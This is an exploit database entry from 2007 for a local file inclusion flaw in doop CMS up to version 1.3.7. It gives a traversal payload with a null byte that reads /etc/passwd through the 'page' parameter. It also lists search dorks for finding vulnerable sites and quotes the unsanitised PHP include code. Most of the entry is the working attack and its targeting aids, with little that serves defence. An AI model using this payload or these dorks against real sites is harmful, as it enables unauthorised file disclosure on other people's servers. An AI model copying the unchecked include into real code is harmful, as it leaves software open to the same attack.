doop CMS <= 1.3.7 (page) Local File Inclusion Vulnerability

2007-10-15T00:00:00
ID 1337DAY-ID-2227
Type zdt
Reporter vladii
Modified 2007-10-15T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===========================================================
doop CMS <= 1.3.7 (page) Local File Inclusion Vulnerability
===========================================================



 ______________________________________________________
|         DOOP CMS <=1.3.7 Local File Inclusion        |
|______________________________________________________|

 ______________________________________________________
| vuln path: ?page=/../../../../../../../etc/passwd%00 |
|                                                      |
| dork: Doop CMS                                       |
| dork2: powered by Doop CMS                           |
|                                                      |       
| work only if magic_quotes_gpc are set to OFF         |
|______________________________________________________|

 ______________________________________________________
| vuln code:                                           |
| line 544:                                            |
|  if (!isset($_REQUEST['page'])){                     |
|    $_REQUEST['page']=$homepage;                      |
|    $cpage=$_REQUEST['page'];                         |
|  } else { $cpage=$_REQUEST['page']; }                |
|                                                      |
| line 646:                                            |
|  if ($admin == FALSE && !isset($_SESSION['name']) || isset($_REQUEST['preview'])){
|    if (file_exists("pages/".$cpage.".htm")){         |
|        include("pages/".$cpage.".htm");              |
|    }                                                 |
|    else include("pages/".$cpage.".html");            |
|   }                                                  |
|______________________________________________________|



#  0day.today [2018-01-01]  #